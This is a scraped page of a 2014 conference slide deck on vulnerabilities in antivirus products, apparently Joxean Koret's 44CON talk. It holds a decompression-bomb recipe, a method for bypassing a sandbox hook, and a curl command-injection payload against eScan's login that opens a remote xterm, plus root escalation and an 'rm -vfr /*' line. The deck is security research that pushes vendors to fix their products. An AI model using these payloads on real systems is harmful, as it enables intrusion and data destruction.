FREE ELECTRONIC LIBRARY - Abstracts, books, theses

Pages:     | 1 || 3 |

«Breaking Antivirus Software Joxean Koret, COSEINC 44CON, 2014 Breaking antivirus software Introduction  Attacking antivirus engines  Finding ...»

-- [ Page 2 ] --

Available for your exploiting pleasure at the fixed addresses 0x10000000 in x86 and 0x18000000000 in AMD64.

Comodo Internet Security It actually means Comodo Internet Security users are actually vulnerable to Exploitation.

Koret is correct and your product sucks hard. Thanks for playing!

AV developers writing security software Remote Denial of Service Examples: ClamAV DOS There was a bug in ClamAV scanning icon resource 

–  –  –

Found via dumb ass fuzzing.

 Reported. Because it's Open Source...

 https://bugzilla.clamav.net/show_bug.cgi?id=10650  The vulnerability was nicely handled by the ClamAV  team (now Cisco).

Decompression bombs (multiple AVs) Do you remember them? If I remember  correctly, the 1st discussion in Bugtraq about it was in 2001.

A compressed file with many compressed files 

–  –  –

* Sophos finishes after ~30 seconds. In a “testing” machine with 16 logical CPUs and 32 GB of RAM.

** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one.

*** In my latest testing, ESET finishes after 1 minute with each file in my “small testing Machine”.

**** Sometimes, it seems to time-out after 5 minutes on Windows.

Decompression bombs: How to To create a simple decompression bomb in 

Unix issue the following commands:

$ truncate -s 8589934592 dumb # 8GB $ 7z/gzip/bzip2/rar/lcab/compress/xxx dumb That's all. The result file is always less than 10  MB.

I couldn't believe that still nowadays antivirus  engines failed at this trivial “attack” when I “discovered” this...

Notes about decompression bombs These bugs are not a big deal. I know.

 However, they can be used like in the following 

–  –  –

It seems nobody cares about this bug.

Also, some companies are really funny:

 http://www.cio.co.nz/article/551276/antivirus_products_riddled_security_flaws_researcher_says/ BitDefender engine BitDefender is a Romanian antivirus engine.

 Their AV core is the most widely distributed AV 

–  –  –

LavaSoft, Immunet, QiHoo 360,...

It suffers from a number of vulnerabilities like  almost all other AV engines/products out there.

Finding vulnerabilities in this engine is trivial.

–  –  –

(Vulnerability fixed) Modifying 2 DWORDs in a PE file 

packed with Shrinker3 packer used to crash it:

Those bytes were used to calculate the file and  sections alignment of the new, in memory, unpacked PE file.

When set to 0xFFFFFFFF and 0xFFFFFFF, both file  and sections alignment were set to 0...

BitDefender bugs...and their values were used, later on, in some 

arithmetic operations:

Those 2 bugs were trivial to discover. But they  failed to find them by themselves...

One more complex BitDefender bug...

(Vulnerability fixed?) Modifying a single byte in a 

Thinstall installer would make it to crash:

After modifying one byte, the decompressed content  would get corrupt. And index to a table was calculated with the corrupted content... and data likely controlled by the attacker was copied to a position also likely controllable.

Again: this bug was trivial to discover. TRIVIAL.

 BitDefender notes This and all BitDefender's bugs don't affect  exclusively BitDefender's products.

It affects many AV products out there as  previously mentioned.

Adding a new AV engine to your product may  sound “cool” but you're making 3rd party bugs yours.

And, by the way, you didn't audit it before 

–  –  –

ESET Nod32 is a well known Slovak AV  engine.

Like many other AV engines, it suffers from a  number of vulnerabilities that can be trivially discovered.

One little example: a malformed PDF file.

–  –  –

They talk in their blog post (http://x90.es/comodofail)  about their sandboxed processes.

They only sandbox processes in Windows, not in Unix.

–  –  –

most AV products out there, no matter what they say.

Comodo example vulnerability I have ~9 bugs in their parsers discovered with my  fuzzers (1 instance, 1 week).

Almost any malformed OLE2 container (i.e., a word  document) can make it to crash.

Let's see an example bug:

–  –  –

Very hard, isn't it?

 BTW, remember: the AV scanning processes  doesn't run sandboxed in Linux.

“Security enhanced” software Security “enhanced” software Some AV suites comes with various other  software programs that are installed by default.

The most typical examples:

–  –  –

Rising is an anti-virus company from China.

 Summary: no ASLR enabled library at all.

 Also, the AV product installs one “security enhanced” 

–  –  –

Everything runs with “Medium” integrity level  and there are 6 libraries without ASLR enabled.

Isn't it cool?

Advice to users of this Rising installed browser:


Security enhanced products...

But, as is common with AV suites, this is not 

–  –  –

Kingsoft distributes with the AV installer one  “security enhanced browser” called Liebao, cheetah in Chinese.

It's installed by default with the AV.

 Also, set as the default browser.

 This browser is exploiter's heaven and they fail 

–  –  –

...or the lack thereof. Proof:

 For users of Liebao: DO NOT USE IT.

 More AV developers writing security software Extra about Kingsoft Also, they install one ad-ware. Yes, your AV  product. It's called NaviNow.

It's from a Japanese company with the same name.

–  –  –

Nevertheless, an AV product is installing, for  you, an ad-ware. Very cool...

My Sandbox is Unbreakable (TM) Talking about sandboxes...

Some AV products, like BKAV or Comodo  Internet Security, as we have seen previously, are good targets for writing targeted exploits against their users because they install a library without ASLR system wide.

But, what is this library for?

–  –  –

Let's take a closer look to one sandbox...

 Or something similar, they said...

Comodo Internet Security Kevin J. Judge, in the Comodo's blog post, used my  research to promote their product, as previously

mentioned... didn't I? :)

He talks a lot about the sandbox of the product and  the protection it gives and bla, bla, bla...

I did check the HIPS and the true sandbox, partially,  they use to run untrusted applications.

The HIPS for ~2 hours (considering the installation 

–  –  –

Let's see the results...

 HIPS/sandbox bypass demo Let's see the black magic behind this...

But, be warned!

You have been warned...

Comodo Internet Security's HIPS Their sandbox (partially) and HIPS system (completely)  are implemented as user-land libraries (BTW, without

ASLR, the HIPS one) injected system wide:

Guard32/64.dll for the HIPS. Cmdvirt32/64.dll for Sandbox.

The libraries simply hooks some user-land functions like:

 CreateFile, CreateProcess, etc... using madCodeHook (a genuine work of non Comodo people).

It was a good enough technology 10 years ago.

 I wonder if they patented user-land hooks. Just curious...

The obvious attack:

 Call FreeLibrary(GetModuleHandle(“guard32.dll”)) from  inside the monitored process.


 Comodo Internet Security's Sandbox On the 1st try I received the error 5, “Access  denied”.

Then, I decided to attach a debugger and see  what happens.

They are also hooking ntdll!LdrUnloadDll. From the  very same library. That's all.

Final try: change page protections of ntdll,  patch the function LdrUnloadDll so the hook is removed, reset page privileges and call FreeLibrary.

Guess what? It works.

 Comodo Internet Security I only bypassed, yet, the “Partially limited”, “Limited” and  “Restricted levels” of the HIPS (according to the GUI this is part of the sandbox but is not... anyway).

It took me 1 hour.

–  –  –

DrWeb is a russian antivirus. Used, for example, by the largest bank  (Sberbank) and the largest search engine in Russia (Yandex) + the Duma, to name a few customers.

More of their propaganda (the original web page I got this information  from is inaccessible since I disclosed just 1 vulnerability during

SyScan 2014 Singapore):

DrWeb updating protocol DrWeb used (still does it?) to update via HTTP  only. They do not use SSL/TLS.

It used to download a catalog file first:

–  –  –

was signed, even the DrWeb32.dll library.

DrWeb updating protocol The “highest grade of certificate from the government” used to  require the highest grade of checking for their virus database files and antivirus libraries: CRC32. Lol.

To exploit in a LAN intercepting these domains was enough:

–  –  –

...and replacing drweb32.dll with your “modified” (lzma'ed) version.

 DrWeb updating protocol Exploiting it was rather easy with ettercap and a quick  Python web server + Unix lzma tool.

You only need to calculate the CRC32 checksum and  compress (lzma) the drweb32.dll file.

I tested the bug under Linux: full code execution is 

–  –  –


One Russian guy wrote a Metasploit exploit for 


http://habrahabr.ru/post/220113/  In my opinion, this updating protocol (is?) was horrible.

 DrWeb updating protocol vulnerability The vulnerability was fixed and “an alert” issued.

 In the “alert” they do not say they fixed a vulnerability.

 http://news.drweb.com/?i=4372&c=5&lng=ru&p=0 

–  –  –

and, I think, Chinese.

They only said that changes were made to increase  the security of the update procedure.

Technically true: From no security to some security.

 I did not research the update. It can be fun as I'm 99% 

–  –  –

that the eScan product have a Linux version.

I downloaded and installed it (~1 hour because of the awful  hotel's connection).

Then I started checking what it installs, finding for SUID  binaries, etc...

They use BitDefender and ClamAV engines, they don't have 

–  –  –

mwconf (created during installation).

 The eScan management application (called  MwAdmin) is so flawed I decided to stop at the first RCE... It was fixed recently.

A command injection in the login form (PHP).

–  –  –

what not to do or how to write easy exploits, as a tutorial.

The user name and the password were used to construct  an operating system command executed via the PHP's function “exec”.

I was not able to inject in the user name.

–  –  –


 Source code of login.php (I) Source code of login.php (II) The password sent to the user was passed to 


There were some very basic checks against the 

–  –  –

But they forgot various other characters like ';'.

 Source code of common_functions.php Then, the given password was used in the 

–  –  –

My super-ultra-very-txupi-complex exploit for it:

 $ xhost + $ export TARGET=http://target:10080 $ curl --data "product=1&uname=valid@user.com&pass=1234567;

DISPLAY=YOURIP:0;xterm;" $TARGET/login.php

Once you're in, run this to escalate privileges:

 $ /opt/MicroWorld/sbin/runasroot /usr/bin/xterm Or anything else you want...

 $ /opt/MicroWorld/sbin/runasroot rm -vfr /* Breaking antivirus software Introduction  Attacking antivirus engines  Finding vulnerabilities  Exploiting antivirus engines  Antivirus vulnerabilities  Conclusions 

–  –  –

...make you more vulnerable to skilled attackers.

...are as vulnerable to attacks as any other application.

 Some AV software...

...may lower your operating system protections.

...are plagued of both local and remote vulnerabilities.

 Some AV companies...

...don't give a fuck about security in their products.

 Breaking antivirus software Introduction  Attacking antivirus engines  Finding vulnerabilities  Exploiting antivirus engines  Antivirus vulnerabilities  Conclusions  Recommendations  Recommendations for AV users Do not blindly trust your AV product.

–  –  –

Isolate the machines with AV engines used for  gateways, network inspection, etc...

Audit your AV engine or ask a 3rd party to audit  the AV engine you want to deploy in your organization.

Recommendations for AV companies Audit your products: source code reviews & fuzzing.

–  –  –

Internal code audits are good. 3rd party ones are awesome.

 Do not use the highest privileges possible for scanning  network packets, files, etc...

You don't need to be root/system to scan a network packet 

–  –  –

privileged or sandboxed, process.

Recommendations for AV companies Run dangerous code under an emulator, vm or, at the very  least, in a sandbox. I only know 3 AVs using this approach.

The file parsers written in C/C++ code are very dangerous.

–  –  –

I'm talking about your AV's running processes.

 Recommendations for AV companies Do not use plain HTTP for updating your 

–  –  –

...and verify there is nothing else after the signature.

 Also, verify the whole certification chain...

 Recommendations for AV companies Drop old code that is of no use today or make this  code not available by default.

Code for MS-DOS era viruses, packers, protectors, 

–  –  –

unsupported products nowadays.

Such old code not touched in years is likely to have  vulnerabilities.

Ignore any antivirus comparative company asking you  to detect malwares from the Jurassic era. Avoid them.

Special for Comodo and some other AV(s)...

Recommendations for AV companies This research is not meant to instruct users to  not install AV products.

This research is meant to highlight the typical  problems in AV products and push the industry to actually write secure security software.

Reporting bugs responsibly would not make 

–  –  –

antivirus software.

Then see the dates and what changed.

 Recommendations for AV companies Also, do not write blog posts demonizing  researchers or manipulating their words in order to promote your products.

Just a friendly recommendation.

 Also, never say anything that can be  understood as “Hackers can't own my product”.

Pages:     | 1 || 3 |

Similar works:

«THE TRAFFIC COMMISSIONER FOR THE WELSH TRAFFIC AREA APPLICATIONS AND DECISIONS PUBLICATION NUMBER: 8369 PUBLICATION DATE: 01 May 2013 OBJECTION DEADLINE DATE: 22 May 2013 Correspondence should be addressed to: Welsh Traffic Area Office Ardal Drafnidiaeth Cymru Hillcrest House 386 Harehills Lane Leeds LS9 6NF Telephone: 0300 123 9000 Fax: 0113 248 8521 Website: www.gov.uk The public counter at the above office is open from 9.30am to 4pm Monday to Friday The next edition of Applications and...»

«STOCK MARKET VOLATILITY SPILLOVER FROM DEVELOPED MARKETS TO REGIONAL MARKETS TIFFANY GROSVENOR AND KEVIN GREENIDGE1 ABSTRACT This paper builds on the work of Kim and Langrin (1996) to investigate the co-movement in stock markets between the developing countries of the Caribbean as well as from developed markets. Multivariate Generalised Autoregressive Conditional Heteroscedasticty (GARCH) is employed to examine the volatility spillover between the three regional exchanges namely that of...»

«Chapter 2 Sources of Variation Variations in process, supply voltage and temperature (PVT) have always been an issue in Integrated Circuit (IC) Design. In digital circuits, PVT fluctuations affect the switching speed of the transistors and thus the timing of the logic. To guarantee fault-free operation for a specified clock frequency, IC designers have to quantify these uncertainties and account for them adequately. This is typically done by guardbanding, i.e. adding sufficient voltage...»

«DAILY COLLECTION OF MARITIME PRESS CLIPPINGS 2015 – 071 Number 071 *** COLLECTION OF MARITIME PRESS CLIPPINGS *** Wednesday 11-03-2015 News reports received from readers and Internet News articles copied from various news sites. The SMIT BUFFALO at LOT3 Suez Canal Photo : Paul Stift © Distribution : daily to 32.350+ active addresses 11-03-2015 Page 1 DAILY COLLECTION OF MARITIME PRESS CLIPPINGS 2015 – 071 Your feedback is important to me so please drop me an email if you have any photos or...»

«A Scripted Life Jessica Morgan The portrait has suffered considerable critique in recent years; a variety of reasons account for its decline in efficacy as a genre. The celebratory or self-aggrandizing qualities of the portrait or self-portrait, the foundations of the genre, have become ironic or playful in contemporary art. Most troubling for the portrait, however, is the drastic mediation of advanced technologies and systems of representation. Our mediated self-knowledge, in tandem with...»

«Computers & Elect. Engng Vol. 16, No. 2, pp. 65-77, 1990 0045-7906/90 $3.00 + 0.00 Printed in Great Britain. All rights reserved Copyright © 1990 Pergamon Press plc TEXTURE IN IMAGES: ALGORITHMS FOR COMPARISON AND SEGMENTATION REN LIANG l, M. SHRIDHAR I a n d M. AHMADI 2 )Department of Electrical and Computer Engineering, University of Michigan-Dearborn, Dearborn, MI 48128, U.S.A. and 2Department of Electrical Engineering, University of Windsor, Windsor, Ontario, Canada N9B 3P4 (Received 15...»


«International Relations http://ire.sagepub.com/ Theorising Risk and Uncertainty in International Relations: The Contributions of Frank Knight Darryl S. L. Jarvis International Relations 2011 25: 296 DOI: 10.1177/0047117811415485 The online version of this article can be found at: http://ire.sagepub.com/content/25/3/296 Published by: http://www.sagepublications.com On behalf of: David Davies Memorial Institute for International Studies Additional services and information for International...»

«A journal of international development cooperation published by the Dag Hammarskjöld Foundation, Uppsala 2002:1 Published in cooperation with PCIJ and SEAPA Access to Information in Southeast Asia and beyond Editorial Note 1 Introduction Sheila S. Coronel 3 The Openness Revolution: The Rise of a Global Movement for Freedom of Information Thomas S. Blanton 7 Democrats and Dictators: Southeast Asia’s Uneven Information Landscape Yvonne T. Chua 22 Opening a Pandora’s Box: The Emergence of a...»

«Hvaal – family Painting of Solveig (Hvaal) Maukon Hilda and Ole with children Preface On these pages we present the story of a large family originating from the farm “Søndre Hvaal” in Lardal, Norway. This farm has been in the family we are describing since 1864. That year Johannes Halvorsen and Anne Oline Evensdatter bought the farm. They had 10 children and it is, in particular, the son Ole (number 5 of the children) we are discussing here. Ole Johannesen Hvaal took over the farm in...»

«MARCH 2005 CDS Conversion Software User Guide for Windows Version 2.0 Updated: 2/24/2006 Table of Contents CDS Conversion Software V2 for Windows User Guide System Requirements Introduction Installing CDS Conversion V2 for Windows Using the CDS Conversion Software Extracting CDS data Formatting the CDS file CDS File Format Options Select a File to Format Destination Directory Format File Name Output Format Split Files by ZIP Code USPS Field Formats Output Record Types Generating the CDS Output...»

«Downloaded from http://polymerphysics.net Interrupted shear flow of unentangled polystyrene melts P. G. Santangelo and C. M. Rolanda) Chemistry Division, Code 6120, Naval Research Laboratory, Washington, DC 20375-5342 (Received 18 September 2000; final revision received 14 December 2000) Synopsis Low molecular weight polystyrene melts were subjected to shearing flow which was periodically halted. Weak maxima in both the viscosity and normal stress were observed upon startup of the flow,...»

<<  HOME   |    CONTACTS
2017 www.sa.i-pdf.info - Abstracts, books, theses

Materials of this site are available for review, all rights belong to their respective owners.
If you do not agree with the fact that your material is placed on this site, please, email us, we will within 1-2 business days delete him.